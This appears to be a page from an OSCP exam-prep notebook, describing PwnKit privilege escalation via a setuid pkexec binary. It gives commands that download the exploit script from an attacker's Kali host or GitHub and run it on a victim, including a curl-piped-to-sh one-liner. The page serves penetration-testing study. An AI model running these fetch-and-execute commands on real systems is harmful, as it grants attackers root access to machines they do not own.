📘
OSCP Exam Prep
OSCP Exam Prep
OSCP Exam Prep
  • Reference List
  • Guideline
  • Commons
    • Basic Scans
    • Service Enumeration
      • HTTP(S) (80 / 443)
      • SMB (139 / 445)
      • FTP (21)
      • DNS (53)
      • SSH (22)
      • LDAP (389/636/3268)
      • Kerberos (88)
      • SNMP (161)
      • SMTP (25)
      • RDP (3389)
      • Evil-WinRM (5985/5986)
      • MYSQL (3306)
      • MSSQL (1433)
    • Default/Common Credentials
    • Shells
      • TTY Shell
    • File Transfer
    • KeePass Database
    • Port Forwarding
    • File Metadata
  • Attacks
    • Run a command x times
    • Public Exploits
    • User Creation
    • Password Cracking
      • Using custom wordlists
    • LFI/RFI
    • SQLi
    • PwnKit
    • SAM and SYSTEM files
    • Phishing for Access (Requires MailSVR)
    • GitDumper
  • Enumeration
    • Linux
    • Windows
  • Privilege Escalation
    • Linux
    • Windows
  • Port Forwarding Extras
    • Linux
    • Windows
  • Active Directory
    • Enumeration
    • Lateral Movement
    • Privilege Escalation
Powered by GitBook
On this page
  1. Attacks

PwnKit

  • Used for privilege escalation if pkexec binary has the special bit permission

On Kali machine:
    git clone https://github.com/ly4k/PwnKit.git
    
On Victim machine:
    wget http://<Kali IP>/PwnKit.sh && chmod +x PwnKit.sh
    ./PwnKit.sh
    
        Or
    
    sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

PreviousSQLiNextSAM and SYSTEM files

Last updated 4 months ago